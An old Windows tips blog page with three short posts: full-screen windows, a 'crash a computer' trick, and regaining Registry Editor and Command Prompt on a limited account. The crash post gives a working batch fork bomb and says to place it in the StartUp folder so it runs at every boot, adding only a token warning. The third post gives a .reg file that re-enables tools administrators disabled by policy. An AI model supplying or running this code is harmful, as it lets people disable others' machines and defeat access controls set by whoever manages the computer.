Wednesday, April 22, 2009

Full screen window

0 comments
















When you need a really big window, don't just maximize it, go full screen! To view a window full screen, hold down the Ctrl key and double-click the window's title bar—or when the window is active, press the F11 key at the top of your keyboard—to get the biggest window possible.

Crash a computer in few secs

1 comments
















How to crash a computer in few secs:

1.Open a text document and put this in it:

@ECHO OFF
:loop

start cmd.exe
goto loop

2.Save this as test.bat on a safe place.

3.Put it in the StartUp folder for crash everytime when windows starts.

4. Run it and the computer will crash.

NOTE: This is just for your knowledge, But PLZ................. don't do this on any system.

How to access Registry Editor and CMD Prompt in limited access account

0 comments









Access Registry editor and CMD Prompt in Limited access account:


To access CMD Prompt & Registry Editor:


The easiest way is, create a text file (or) Notepad and write "COMMAND" in it and then saving it as "cmd.bat". This will give you access to Command Prompt by a double click.

If this doesn't work at all or you need to allow the use of REGEDIT and CMD you can just make your own registry file and run it on the computer. This will give you the rights to use them. Simply write the below lines in a text file (or) Notepad.
REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0

Save it as test.reg and run the file. If it prompt a Yes or No message then simply press Yes.

After that you should have access to Registry Editor and the Command Prompt.
 

Tips2All. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com